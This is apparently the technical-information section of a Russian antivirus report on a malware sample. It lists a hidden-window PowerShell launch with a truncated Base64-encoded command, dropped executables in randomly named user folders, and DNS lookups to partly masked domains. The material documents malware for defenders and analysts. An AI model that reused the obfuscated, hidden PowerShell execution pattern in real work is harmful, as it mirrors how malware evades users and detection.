Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAHYAIAAgAFIAeQBCACAAIAAoACAAWwB0AFkAcABlAF0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAIAAnAHIARQBjAFQAbwByACcALAAnAHMAeQBzAFQARQBtAC4AaQBPAC4AJwAsACcAZABJACcALA...
- %HOMEPATH%\zjcg48d\hndlv98\ri4avw.exe
- %HOMEPATH%\zjcg48d\hndlv98\ri4avw.exe
- %HOMEPATH%\zjcg48d\hndlv98\ri4avw.exe
- http://go####rbwebmart.com/
- DNS ASK 36#######.beyondb-school.com
- DNS ASK nh###uong.xyz
- DNS ASK br####ourself.us
- DNS ASK go####rbwebmart.com
- DNS ASK ca##99a.com
- DNS ASK se###iken.net
- DNS ASK ar###samois.fr
- DNS ASK fi###emes.com
- DNS ASK na###oyoi5.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAHYAIAAgAFIAeQBCACAAIAAoACAAWwB0AFkAcABlAF0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAIAAnAHIARQBjAFQAbwByACcALAAnAHMAeQBzAFQARQBtAC4AaQBPAC4AJwAsACcAZABJACcALA...' (со скрытым окном)